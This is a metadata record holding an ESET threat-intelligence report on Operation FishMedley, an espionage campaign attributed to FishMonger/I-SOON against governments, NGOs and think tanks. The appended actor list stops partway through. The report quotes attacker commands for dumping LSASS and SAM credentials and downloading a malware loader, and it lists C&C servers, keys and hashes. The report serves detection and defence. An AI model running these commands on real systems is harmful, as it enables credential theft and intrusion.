{
	"id": "be1643d6-10d9-4e13-bae1-7a9357c5b08e",
	"created_at": "2026-04-06T00:21:29.763244Z",
	"updated_at": "2026-04-10T03:36:48.219803Z",
	"deleted_at": null,
	"sha1_hash": "7c1b6bb1a9104b7082ee7ef7222b20dd95890321",
	"title": "Operation FishMedley targeting governments, NGOs, and think tanks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 641241,
	"plain_text": "Operation FishMedley targeting governments, NGOs, and think tanks\r\nBy Matthieu Faou\r\nArchived: 2026-04-02 10:46:12 UTC\r\nOn March 5th, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I‑SOON for their\r\ninvolvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to\r\nthe FishMonger APT group – I‑SOON’s operational arm – including the compromise of seven organizations that we\r\nidentified as being targeted in a 2022 campaign that we named Operation FishMedley.\r\nKey points of this blogpost:\r\nVerticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia,\r\nEurope, and the United States.\r\nOperators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to\r\nChina-aligned threat actors.\r\nWe assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.\r\nIndependent of the DOJ indictment, we determined that FishMonger is operated by I‑SOON.\r\nFishMonger profile\r\nFishMonger – a group believed to be operated by the Chinese contractor I‑SOON (see our Q4 2023-Q1 2024 APT Activity\r\nReport) – falls under the Winnti Group umbrella and is most likely operating out of China, from the city of Chengdu where\r\nI‑SOON’s office was located. FishMonger is also known as Earth Lusca, TAG‑22, Aquatic Panda, or Red Dev 10. We\r\npublished an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic\r\nprotests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution\r\nto FishMonger.\r\nThe group is known to operate watering-hole attacks, as reported by Trend Micro. 
FishMonger’s toolset includes\r\nShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.\r\nOverview\r\nOn March 5th, 2025, the US Department of Justice published a press release and unsealed an indictment against I‑SOON\r\nemployees and officers of China’s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023.\r\nThe FBI also added those named in the indictment to its “most wanted” list and published a poster, as seen in Figure 1.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 1 of 13\n\nFigure 1. Names of FishMonger / I‑SOON members (source: FBI)\r\nThe indictment describes several attacks that are strongly related to what we published in a private APT intelligence report\r\nin early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments,\r\nNGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the\r\nrecently published indictment.\r\nDuring 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are\r\ncommonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this\r\nblogpost and have named that campaign Operation FishMedley.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 2 of 13\n\nFishMonger and I-SOON\r\nDuring our research, we were able to independently determine that FishMonger is an espionage team operated by I‑SOON, a\r\nChinese contractor based in Chengdu that suffered an infamous document leak in 2024 – see this comprehensive analysis\r\nfrom Harfang Labs.\r\nVictimology\r\nTable 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious\r\ninterest to the Chinese government.\r\nTable 1. 
Victimology details\r\nVictim Date of compromise Country Vertical\r\nA January 2022 Taiwan Governmental organization.\r\nB January 2022 Hungary Catholic organization.\r\nC February 2022 Turkey Unknown.\r\nD March 2022 Thailand Governmental organization.\r\nE April 2022 United States Catholic charity operating worldwide.\r\nF June 2022 United States NGO – mainly active in Asia.\r\nG October 2022 France Geopolitical think tank.\r\nTable 2 summarizes the implants used during each intrusion of Operation FishMedley.\r\nTable 2. Details of the implants used against each victim\r\nVictim | Tool ScatterBee-packed ShadowPad Spyder SodaMaster RPipeCommander\r\nA ●      \r\nB     ●  \r\nC     ●  \r\nD ● ●   ●\r\nE     ●  \r\nF ●   ●  \r\nG     ●  \r\nTechnical analysis\r\nInitial access\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 3 of 13\n\nWe were unable to identify the initial compromise vectors. For most cases, the attackers seemed to have had privileged\r\naccess inside the local network, such as domain administrator credentials.\r\nAt Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local\r\nnetwork. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials\r\nthat allowed them to connect to the console.\r\nAt Victim F, the implants were delivered using Impacket, which means that the attackers somehow previously compromised\r\na high-privilege domain account.\r\nLateral movement\r\nAt Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and\r\ninstalled implants.\r\nTable 3 shows that the operators first did some manual reconnaissance using quser.exe, wmic.exe, and ipconfig.exe. Then\r\nthey tried to get credentials and other secrets by dumping the local security authority subsystem service (LSASS) process\r\n(PID 944). 
The PID of the process was obtained via tasklist /svc and the dump was performed using comsvcs.dll, which is a\r\nknown living-off-the-land binary (LOLBIN). Note that it is likely that the attackers executed quser.exe to see whether other\r\nusers or admins were also logged in, meaning privileged accesses were present in LSASS. According to Microsoft\r\ndocumentation, to use this command the attacker must have Full Control permission or special access permission.\r\nThey also saved the registry hives sam.hive and system.hive, which can both contain secrets or credentials.\r\nFinally, they tried to dump the LSASS process again, using a for loop iterating over the output from tasklist.exe. We have\r\nseen this same code used on other machines, so it is a good idea to block or at least alert on it.\r\nTable 3. Commands executed via Impacket on a machine at Victim F\r\nTimestamp\r\n(UTC)\r\nCommand\r\n2022-06-21\r\n07:34:07\r\nquser\r\n2022-06-21\r\n14:41:23\r\nwmic os get lastbootuptime\r\n2022-06-21\r\n14:41:23\r\nipconfig /all\r\n2022-06-21\r\n14:41:23\r\ntasklist /svc\r\n2022-06-21\r\n14:41:23\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c\r\n\"C:\\Windows\\System32\\rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 944\r\nc:\\users\\public\\music\\temp.tmp full\"\r\n2022-06-21\r\n14:41:23\r\nreg save hklm\\sam C:\\users\\public\\music\\sam.hive\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 4 of 13\n\nTimestamp\r\n(UTC)\r\nCommand\r\n2022-06-21\r\n14:41:23\r\nreg save hklm\\system C:\\users\\public\\music\\system.hive\r\n2022-06-21\r\n14:41:23\r\nnet user\r\n2022-06-22\r\n07:05:37\r\ntasklist /v\r\n2022-06-22\r\n07:07:33\r\ndir c:\\users\r\n2022-06-22\r\n09:47:52\r\nfor /f \"tokens=1,2 delims= \" ^%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" | find\r\n\"lsass\"\"') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B\r\n\\Windows\\Temp\\YDWS6P.xml full\r\nToolset\r\nShadowPad\r\nShadowPad 
is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups,\r\nincluding FishMonger and SparklingGoblin, as documented by SentinelOne. In Operation FishMedley, the attackers used a\r\nShadowPad version packed with ScatterBee.\r\nAt Victim D, the loader was downloaded using the following PowerShell command:\r\npowershell (new-object\r\nSystem.Net.WebClient).DownloadFile(\"http://\u003cvictim’s_web_server_IP_address\u003e/Images/menu/log.dll\";\"c:\\users\\public\\log.dll\"\r\nThis shows that the attackers compromised a web server at the victim’s organization to use it as a staging server for their\r\nmalware.\r\nAt Victim F, Firefox was used to download the loader, from http://5.188.230[.]47/log.dll. We don’t know whether attackers\r\nhad interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the\r\nvictim was redirected to the download page, say via a watering-hole attack.\r\nlog.dll is side-loaded by an old Bitdefender executable (original name: BDReinit.exe) and loads ShadowPad from a file\r\nnamed log.dll.dat, which can be decrypted using the scripts provided in PwC’s GitHub repository.\r\nWe did not recover the log.dll.dat from the victim’s machine, but we found a fake Adobe Flash installer on VirusTotal with\r\nthe identical log.dll file. The configuration of the ShadowPad payload is provided in Table 4.\r\nTable 4. 
ShadowPad configuration\r\nField Decrypted value\r\nTimestamp 3/14/2022 10:52:16 PM\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 5 of 13\n\nField Decrypted value\r\nCampaign code 2203\r\nFile path %ALLUSERSPROFILE%\\DRM\\Test\\\r\nSpoofed name Test.exe\r\nLoader filename log.dll\r\nPayload filename log.dll.dat\r\nService name MyTest2\r\nAlternative service name MyTest2\r\nAlternative service name MyTest2\r\nRegistry key path SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nService description MyTest2\r\nProgram to inject into %ProgramFiles%\\Windows Media Player\\wmplayer.exe\r\nAlternative injection target N/A\r\nAlternative injection target N/A\r\nAlternative injection target %windir%\\system32\\svchost.exe\r\nC\u0026C URL TCP://api.googleauthenticatoronline[.]com:443\r\nAlternative C\u0026C URL UDP://api.googleauthenticatoronline[.]com:443\r\nAlternative C\u0026C URL N/A\r\nAlternative C\u0026C URL N/A\r\nProxy info string SOCKS4\\n\\n\\n\\n\\n\r\nProxy info string SOCKS4\\n\\n\\n\\n\\n\r\nProxy info string SOCKS5\\n\\n\\n\\n\\n\r\nProxy info string SOCKS5\\n\\n\\n\\n\\n\r\nNote that from March 20th, 2022 to November 2nd, 2022, the C\u0026C domain resolved to 213.59.118[.]124, which is\r\nmentioned in a VMware blogpost about ShadowPad.\r\nSpyder\r\nAt Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in\r\ngreat detail by Dr.Web.\r\nA Spyder loader was downloaded from http://\u003ca_victim’s_web_server_IP_address\u003e/Images/menu/aa.doc and dropped to\r\nC:\\Users\\Public\\task.exe around 18 hours after ShadowPad was installed.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 6 of 13\n\nThe loader – see Figure 2; reads the file c:\\windows\\temp\\guid.dat and decrypts its contents using AES-CBC. The\r\nencryption key is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00. 
The initialization vector (IV) is the first\r\neight bytes of the key. Unfortunately, we were unable to recover the guid.dat file.\r\nFigure 2. Spyder loader\r\nThen, the loader injects the decoded content – likely shellcode – into itself (task.exe process) as seen in Figure 3.\r\nFigure 3. Spyder loader – injection part\r\nDespite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory and it was almost\r\nidentical to the Spyder variant documented by Dr.Web. The C\u0026C server was hardcoded to 61.238.103[.]165.\r\nInterestingly, multiple subdomains of junlper[.]com, a known Spyder C\u0026C domain and a weak homoglyph domain to\r\njuniper.net, resolved to 61.238.103[.]165 in 2022.\r\nA self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint\r\n89EDCFFC66EDA3AEB75E140816702F9AC73A75F0. According to SentinelOne, it is a certificate used by FishMonger\r\nfor its C\u0026C servers.\r\nSodaMaster\r\nSodaMaster is a backdoor that was documented by Kaspersky in 2021. APT10 was the first group known to have access to\r\nthis backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.\r\nSodaMaster can only be found decrypted in memory and that’s where we detected it. Even though we did not recover the\r\nfull loading chain, we have identified a few samples that are the first step of the chain.\r\nSodaMaster loaders\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 7 of 13\n\nWe found six different malicious DLLs that are abusing legitimate executables via DLL side-loading. They all implement\r\nthe same decryption and injection routine.\r\nFirst, the loader reads a hardcoded file, for example debug.png, and XOR decrypts it using a hardcoded 239-byte key. Table\r\n5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the\r\ntable. 
Also note that we did not recover any of these encrypted payloads.\r\nTable 5. SodaMaster loaders\r\nSHA-1 DLL name Payload filename\r\n3C08C694C222E7346BD8\r\n633461C5D19EAE18B661\r\nDrsSDK.dll \u003ccurrent_directory\u003e\\debug.png\r\nD8B631C551845F892EBB\r\n5E7D09991F6C9D4FACAD\r\nlibvlc.dll \u003ccurrent_directory\u003e\\vlc.cnf\r\n3A702704653EC847CF91\r\n21E3F454F3DBE1F90AFD\r\nsafestore64.dll \u003ccurrent_directory\u003e\\Location\r\n3630F62771360540B667\r\n01ABC8F6C868087A6918\r\nDeElevator64.dll \u003ccurrent_directory\u003e\\Location\r\nA4F68D0F1C72C3AC9D70\r\n919C17DC52692C43599E\r\nlibmaxminddb-0.dllC:\\windows\\system32\\\r\nMsKeyboardFilterapi.dll\r\n5401E3EF903AFE981CFC\r\n2840D5F0EF2F1D83B0BF\r\nsafestore641.dll \u003ccurrent_directory\u003e\\Location\r\nThen, the decrypted buffer is injected into a newly created, suspended svchost.exe process – see Figure 4.\r\nFigure 4. SodaMaster injection\r\nFinally, the shellcode is executed using either CreateRemoteThread (on Windows XP or older versions) or, on newer\r\nWindows versions, via NtCreateThreadEx as shown in Figure 5.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 8 of 13\n\nFigure 5. Execution of the injected payload\r\nThe last four loaders in Table 5 have additional features:\r\nThey have an export named getAllAuthData that implements a password stealer for Firefox. It reads the Firefox\r\nSQLite database and runs the query SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM\r\nmoz_logins.\r\nThe last three loaders persist as a service named Netlock, MsKeyboardFiltersrv, and downmap, respectively.\r\nSodaMaster payload\r\nAs mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we’ve found don’t seem\r\nto have evolved much. 
They still implement the same four backdoor commands (d, f, l, and s) that were present in 2021.\r\nTable 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different\r\nC\u0026C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.\r\nTable 6. SodaMaster configuration\r\nVictim C\u0026C server RSA key\r\nB 162.33.178[.]23\r\nMIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6Cg\r\nXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV\r\nDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV\r\nZoKjcxAgMBAAE=\r\nC 78.141.202[.]70\r\nMIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6Cg\r\nXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV\r\nDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV\r\nZoKjcxAgMBAAE=\r\nF 192.46.223[.]211\r\nMIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdj\r\nUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7b\r\nXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68H\r\nygzq19AgMBAAE=\r\nG 168.100.10[.]136\r\nMIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6N\r\nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6\r\n+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi\r\n21PGk5AgMBAAE=\r\nRPipeCommander\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 9 of 13\n\nAt Victim D, we captured a previously unknown implant in the same process where Spyder was running. It was probably\r\nloaded from disk or downloaded by Spyder. Because its DLL export name was rcmd64.dll, we named this implant\r\nRPipeCommander.\r\nRPipeCommander is multithreaded and uses IoCompletionPort to manage the I/O requests of the multiple threads. 
It creates\r\nthe named pipe \\\\.\\Pipe\\CmdPipe\u003cPID\u003e, where \u003cPID\u003e is the current process ID, and reads from and writes into this pipe.\r\nRPipeCommander is a reverse shell that accepts three commands via the named pipe:\r\nh (0x68): create a cmd.exe process and bind pipes to the process to send commands and read the output.\r\ni (0x69): Write a command in the existing cmd.exe process or read the output of the previous command.\r\nj (0x6A): exit the cmd.exe process by writing exit\\r\\n in the command shell.\r\nNote that it seems we only have the server side of RPipeCommander. It is likely that a second component, a client, is used to\r\nsend commands to the server from another machine on the local network.\r\nFinally, RPipeCommander is written in C++ and RTTI information was included in the captured samples, allowing us to\r\nobtain some of the class names:\r\nCPipeServer\r\nCPipeBuffer\r\nCPipeSrvEvent\r\nCPipeServerEventHandler\r\nOther tools\r\nIn addition to the main implants described above, the attackers used a few additional tools to collect or exfiltrate data, which\r\nwe describe in Table 7.\r\nTable 7. Other tools used during Operation FishMedley\r\nFilename Details\r\nC:\\Windows\\system32\\\r\nsasetup.dll\r\nCustom password filter. The export PasswordChangeNotify is called when the user changes\r\ntheir password, and it writes the new password on disk in the current working directory in a\r\nlog file named etuper.log. Note that it can also exfiltrate the password by sending a POST\r\nrequest to a hardcoded C\u0026C server, with flag=\u003cpassword\u003e in the POST data. 
However, this\r\nfunctionality is not enabled in this specific sample and there is no C\u0026C server in the\r\nconfiguration.\r\nC:\\Windows\\debug\\\r\nsvhost.tmp\r\nThe fscan network scanner, available on GitHub.\r\nC:\\nb.exe nbtscan – a NetBIOS scanner.\r\nC:\\Users\\public\\\r\ndrop.zip\r\nIt contains only dbxcli – a tool written in Go to interact with Dropbox. It was likely used to\r\nexfiltrate data from the victim’s network, but we haven’t retrieved any information about the\r\nattackers’ account.\r\nNote that, despite the.zip extension, this is a CAB file. It was downloaded from\r\nhttp://45.76.165[.]227/wECqKe529r.png.\r\nAlso note that dbxcli seems to have been compiled by the attackers, since the hash (SHA-1:\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 10 of 13\n\nFilename Details\r\n2AD82FFA393937A2353096FE2A2209E0EBC1C9D7) has a very low prevalence in the\r\nwild.\r\nConclusion\r\nIn this blogpost, we have shown how FishMonger conducted a campaign against high-profile entities all around the world\r\nand was the subject of a US DOJ indictment in March 2025. We also showed that the group is not shy about reusing well-known implants, such as ShadowPad or SodaMaster, even long after they have been publicly described. Finally, we have\r\nindependently confirmed that FishMonger is a team that is part of the Chinese company I‑SOON.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. 
For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\nD61A4387466A0C999981\r\n086C2C994F2A80193CE3\r\nN/A Win32/Agent.ADVC ShadowPad dropper.\r\n918DDD842787D64B244D\r\n353BFC0E14CC037D2D97\r\nlog.dll Win32/Agent.ADVC\r\nScatterBee-packed\r\nShadowPad loader.\r\nF12C8CEC813257890F48\r\n56353ABD9F739DEED890\r\ntask.exe Win64/Agent.BEJ Spyder loader.\r\n3630F62771360540B667\r\n01ABC8F6C868087A6918\r\nDeElevator64.dll Win64/PSW.Agent.CU SodaMaster loader.\r\n3C08C694C222E7346BD8\r\n633461C5D19EAE18B661\r\nDrsSDK.dll Win64/Agent.CAC SodaMaster loader.\r\n5401E3EF903AFE981CFC\r\n2840D5F0EF2F1D83B0BF\r\nsafestore64.dll Win64/PSW.Agent.CU SodaMaster loader.\r\nA4F68D0F1C72C3AC9D70\r\n919C17DC52692C43599E\r\nlibmaxminddb\r\n-0.dll\r\nWin64/PSW.Agent.CU SodaMaster loader.\r\nD8B631C551845F892EBB\r\n5E7D09991F6C9D4FACAD\r\nlibvlc.dll Win64/Agent.BFZ SodaMaster loader.\r\n3F5F6839C7DCB1D164E4\r\n813AF2E30E9461AB35C1\r\nsasetup.dll Win64/PSW.Agent.CB\r\nMalicious password\r\nfilter.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 11 of 13\n\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n213.59.118[.]124\r\napi.googleauthenticatoro\r\nnline[.]com\r\nSTARK INDUSTRIES 2022‑03‑20\r\nShadowPad C\u0026C\r\nserver.\r\n61.238.103[.]165 N/A IRT-HKBN-HK 2022‑03‑10 Spyder C\u0026C server.\r\n162.33.178[.]23 N/A BL Networks 2022‑03‑28\r\nSodaMaster C\u0026C\r\nserver.\r\n78.141.202[.]70 N/A\r\nThe Constant\r\nCompany\r\n2022‑05‑18\r\nSodaMaster C\u0026C\r\nserver.\r\n192.46.223[.]211 N/A\r\nAkamai Connected\r\nCloud\r\n2022‑06‑22\r\nSodaMaster C\u0026C\r\nserver.\r\n168.100.10[.]136 N/A BL Networks 2022‑05‑12\r\nSodaMaster C\u0026C\r\nserver.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 16 of the MITRE ATT\u0026CK 
framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nFishMonger rented servers at several hosting\r\nproviders.\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nFishMonger bought domains and used them for\r\nC\u0026C traffic.\r\nExecution\r\nT1059.001\r\nCommand-Line Interface:\r\nPowerShell\r\nFishMonger downloaded ShadowPad using\r\nPowerShell.\r\nT1059.003\r\nCommand-Line Interface:\r\nWindows Command Shell\r\nFishMonger deployed Spyder using a BAT script.\r\nT1072 Software Deployment Tools\r\nFishMonger gained access to a local admin console,\r\nabusing it to run commands on other machines in\r\nthe victim’s network.\r\nPersistence T1543.003\r\nCreate or Modify System\r\nProcess: Windows Service\r\nSome SodaMaster loaders persist via a Windows\r\nservice.\r\nDefense\r\nEvasion\r\nT1574.002\r\nHijack Execution Flow: DLL\r\nSide-Loading\r\nShadowPad is loaded by a DLL named log.dll that is\r\nside-loaded by a legitimate Bitdefender executable.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nShadowPad, Spyder, and SodaMaster are decrypted\r\nand loaded into memory.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 12 of 13\n\nTactic ID Name Description\r\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from Web\r\nBrowsers\r\nSome SodaMaster loaders can extract passwords\r\nfrom the local Firefox database.\r\nT1556.002\r\nModify Authentication\r\nProcess: Password Filter\r\nDLL\r\nFishMonger used a custom password filter DLL that\r\ncan write passwords to disk or exfiltrate them to a\r\nremote server.\r\nT1003.001\r\nOS Credential Dumping:\r\nLSASS Memory\r\nFishMonger dumped LSASS memory using\r\nrundll32 C:\\windows\\system32\\comsvcs.dll,\r\nMiniDump.\r\nT1003.002\r\nOS Credential Dumping:\r\nSecurity Account Manager\r\nFishMonger dumped the security account manager\r\nusing reg save 
hklm\\sam\r\nC:\\users\\public\\music\\sam.hive.\r\nDiscovery\r\nT1087.001\r\nAccount Discovery: Local\r\nAccount\r\nFishMonger executed net user.\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nFishMonger executed ipconfig /all.\r\nT1007 System Service Discovery FishMonger executed tasklist /svc.\r\nT1057 Process Discovery FishMonger executed tasklist /v.\r\nLateral\r\nMovement\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nFishMonger used Impacket to deploy malware on\r\nother machines in the local network.\r\nCommand and\r\nControl\r\nT1095\r\nNon-Application Layer\r\nProtocol\r\nShadowPad communicates over raw TCP and UDP.\r\nSource: https://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nhttps://www.welivesecurity.com/en/eset-research/operation-fishmedley/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/operation-fishmedley/"
	],
	"report_names": [
		"operation-fishmedley"
	],
	"threat_actors": [
		{
			"id": "ec14074c-8517-40e1-b4d7-3897f1254487",
			"created_at": "2023-01-06T13:46:38.300905Z",
			"updated_at": "2026-04-10T02:00:02.918468Z",
			"deleted_at": null,
			"main_name": "APT10",
			"aliases": [
				"Red Apollo",
				"HOGFISH",
				"BRONZE RIVERSIDE",
				"G0045",
				"TA429",
				"Purple Typhoon",
				"STONE PANDA",
				"Menupass Team",
				"happyyongzi",
				"CVNX",
				"Cloud Hopper",
				"ATK41",
				"Granite Taurus",
				"POTASSIUM"
			],
			"source_name": "MISPGALAXY:APT10",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "19935e32-f1a5-462d-8934-8b1c3bf3b5f2",
			"created_at": "2022-10-25T16:07:23.36465Z",
			"updated_at": "2026-04-10T02:00:04.565476Z",
			"deleted_at": null,
			"main_name": "Aquatic Panda",
			"aliases": [
				"G0143"
			],
			"source_name": "ETDA:Aquatic Panda",
			"tools": [
				"Agentemis",
				"Bladabindi",
				"Cobalt Strike",
				"CobaltStrike",
				"Fishmaster",
				"JollyJellyfish",
				"Jorik",
				"cobeacon",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c8b57a00-18f4-4e49-9954-849de5e97506",
			"created_at": "2023-11-05T02:00:08.065073Z",
			"updated_at": "2026-04-10T02:00:03.395154Z",
			"deleted_at": null,
			"main_name": "SparklingGoblin",
			"aliases": [],
			"source_name": "MISPGALAXY:SparklingGoblin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5bbced13-72f7-40dc-8c41-dcce75bf885e",
			"created_at": "2022-10-25T15:50:23.695735Z",
			"updated_at": "2026-04-10T02:00:05.335976Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"Winnti Group"
			],
			"source_name": "MITRE:Winnti Group",
			"tools": [
				"PipeMon",
				"Winnti for Windows",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6a0effeb-3ee2-4a67-9a9f-ef5c330b1c3a",
			"created_at": "2023-09-07T02:02:47.827633Z",
			"updated_at": "2026-04-10T02:00:04.873323Z",
			"deleted_at": null,
			"main_name": "RedHotel",
			"aliases": [
				"Operation FishMedley",
				"RedHotel",
				"TAG-22"
			],
			"source_name": "ETDA:RedHotel",
			"tools": [
				"Agentemis",
				"BIOPASS",
				"BIOPASS RAT",
				"BleDoor",
				"Brute Ratel",
				"Brute Ratel C4",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"POISONPLUG.SHADOW",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"ShadowPad Winnti",
				"SprySOCKS",
				"Spyder",
				"Winnti",
				"XShellGhost",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ba9fa308-a29a-4928-9c06-73aafec7624c",
			"created_at": "2024-05-01T02:03:07.981061Z",
			"updated_at": "2026-04-10T02:00:03.750803Z",
			"deleted_at": null,
			"main_name": "BRONZE RIVERSIDE",
			"aliases": [
				"APT10 ",
				"CTG-5938 ",
				"CVNX ",
				"Hogfish ",
				"MenuPass ",
				"MirrorFace ",
				"POTASSIUM ",
				"Purple Typhoon ",
				"Red Apollo ",
				"Stone Panda "
			],
			"source_name": "Secureworks:BRONZE RIVERSIDE",
			"tools": [
				"ANEL",
				"AsyncRAT",
				"ChChes",
				"Cobalt Strike",
				"HiddenFace",
				"LODEINFO",
				"PlugX",
				"PoisonIvy",
				"QuasarRAT",
				"QuasarRAT Loader",
				"RedLeaves"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
